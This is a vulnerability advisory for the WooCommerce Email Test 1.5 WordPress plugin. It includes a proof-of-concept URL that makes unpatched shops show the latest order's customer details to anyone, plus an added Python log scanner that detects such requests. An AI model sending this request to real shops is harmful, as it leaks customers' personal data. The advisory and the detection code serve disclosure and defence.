WooCommerce Email Test 1.5 - Order Information Disclosure



Description
When this plugin is installed, any anonymous user can open this URL:

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order

This shows the last (most recent) order along with all customer details, email address and cart content.

This is a severe security/data privacy breach and unlawful in (at least) Germany.

Proof of Concept
Replace "domainname" with a domain to be tested:

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order
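
A log check for the request described above, added here as an example; it is not part of the original advisory or of the plugin's code. It assumes web-server access logs in Combined Log Format, and the sample lines and IP addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

PARAM = "woocommerce_email_test"  # query parameter named in the advisory

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def find_preview_hits(lines):
    """Return every logged request that carried the email-test parameter."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes names, so encoded spellings are caught too
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if PARAM not in query:
            continue
        hits.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "template": query[PARAM][0],
            # A 200 with a body is only a candidate: a fixed site may answer
            # 200 with its normal page, so compare the size before concluding.
            "candidate": m["status"] == "200" and m["size"] not in ("-", "0"),
        })
    return hits

def summarize(hits):
    """Count requests and candidate disclosures per client address."""
    by_ip = defaultdict(lambda: {"requests": 0, "candidates": 0})
    for h in hits:
        by_ip[h["ip"]]["requests"] += 1
        by_ip[h["ip"]]["candidates"] += int(h["candidate"])
    return dict(by_ip)

SAMPLE_LOG = [  # constructed sample lines, documentation-range addresses
    '203.0.113.7 - - [08/Dec/2016:10:12:01 +0100] "GET /?woocommerce_email_test=WC_Email_Customer_Completed_Order HTTP/1.1" 200 18342 "-" "curl/7.50"',
    '203.0.113.7 - - [08/Dec/2016:10:12:09 +0100] "GET /?woocommerce_email_test=WC_Email_Customer_Completed_Order HTTP/1.1" 200 18342 "-" "curl/7.50"',
    '198.51.100.23 - - [08/Dec/2016:10:13:44 +0100] "GET /shop/?orderby=price HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
    '198.51.100.40 - - [09/Dec/2016:08:01:17 +0100] "GET /?woocommerce%5Femail%5Ftest=WC_Email_Customer_Completed_Order HTTP/1.1" 403 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, counts in summarize(find_preview_hits(SAMPLE_LOG)).items():
        print(ip, counts)
```

Each candidate hit corresponds to one order that may have been shown, so the timestamps help narrow down which orders were the most recent at that moment.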

Affects Plugin

fixed in version 1.6

References

URL https://plugins.trac.wordpress.org/changeset/1549532/woocommerce-email-test

Classification

Type BYPASS

Miscellaneous

Submitter jansass GmbH
Submitter Website www.jansass.com
Views 5764
Verified No
WPVDB ID 8689

Timeline

Publicly Published 2016-12-08
Added 2016-12-09
Last Updated 2019-11-01
